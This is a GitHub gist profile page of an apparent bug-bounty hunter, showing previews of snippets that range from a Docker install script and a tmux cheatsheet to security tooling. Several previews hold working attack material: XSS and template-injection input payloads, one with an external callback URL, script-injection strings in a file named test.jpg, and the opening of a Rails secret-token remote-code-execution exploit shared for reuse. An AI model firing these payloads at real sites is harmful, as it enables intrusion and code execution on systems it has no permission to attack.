Skip to content

Instantly share code, notes, and snippets.

Avatar
Focusing

Arbaz Hussain arbazkiraak

Focusing
View GitHub Profile
View Kali 2016.1, Docker Install script
#!/bin/bash
# update apt-get
export DEBIAN_FRONTEND="noninteractive"
sudo apt-get update
# remove previously installed Docker
sudo apt-get purge lxc-docker*
sudo apt-get purge docker.io*
View hacker-inputfield-approachs.txt
'>"/><svg/onload=prompt(1)>{{7*7}}http://hacker.blinkie.xyz:1337 <?php echo"HACKKED" ?>
View gist:fb737f1f745ae07193860762f8710935
wget -q http://s3.amazonaws.com/alexa-static/top-1m.csv.zip;unzip top-1m.csv.zip; awk -F ',' '{print $2}' top-1m.csv|head -1000 > top-1000.txt; rm top-1m.csv*
View tmux_cheatsheet.markdown

tmux cheatsheet

As configured in my dotfiles.

start new:

tmux

start new with session name:

View gist:77bb058366e5d646cf4f58869e4da190
from burp import IBurpExtender,IProxyListener
class BurpExtender(IBurpExtender,IProxyListener):
def registerExtenderCallbacks(self,callbacks):
self._helpers = callbacks.getHelpers()
self._callbacks = callbacks
self._callbacks.setExtensionName("IProxyListener Params")
self._callbacks.registerProxyListener(self)
def processProxyMessage(self,messageIsRequest,message):
View offsets
[array('i', [143, 150]),
array('i', [207, 214]),
array('i', [753, 760]),
array('i', [931, 938]),
array('i', [1140, 1147]),
array('i', [1390, 1397]),
array('i', [1543, 1550]),
array('i', [1666, 1673]),
array('i', [1950, 1957]),
array('i', [4193, 4200]),
@arbazkiraak
arbazkiraak / test.jpg
Created Apr 11, 2019
nothing'>"/><ScRipt>prompt(1)</ScRipt>
View test.jpg
nothing'>"/><ScRipt>prompt(1)</ScRipt>nothing'>"/><ScRipt>prompt(1)</ScRipt>nothing'>"/><ScRipt>prompt(1)</ScRipt>nothing'>"/><ScRipt>prompt(1)</ScRipt>
View rails-secret-token-rce.rb
#THIS IS COPIED FROM SOME WHERE. I just saved it in my gists so this can come handy to others
require 'base64'
require 'openssl'
require 'optparse'
require 'open-uri'
SECRET_TOKEN = "SECRET HERE"
code = "eval('`COMMAND HERE`')"
marshal_payload = Base64.encode64(
"\x04\x08" +
"o" +
@arbazkiraak
arbazkiraak / phantonjs-xss.html
Last active Sep 15, 2019 — forked from yeukhon/test.html
Simple XSS detector using PhantomJS
View phantonjs-xss.html
<html>
<head></head>
<body>
<a href="javascript: alert('clicked xss link')" id="link">click me</a>
<img src="xx" onerror="alert('xss')" />
</body>
</html>
@arbazkiraak
arbazkiraak / bb-foxyproxy-pattern.json
Created Jul 2, 2020 — forked from ignis-sec/bb-foxyproxy-pattern.json
foxyproxy pattern (install Storage area explorer and import this file, foxyproxy import/export is broken)
View bb-foxyproxy-pattern.json
{
"30523382": {
"className": "Proxy",
"data": {
"bypassFPForPAC": true,
"color": "#f57575",
"configUrl": "",
"credentials": "U2FsdGVkX1+tf3lvD5TBClW2UUSZAT4AWsCo/i0kU2M=",
"cycle": false,
"enabled": true,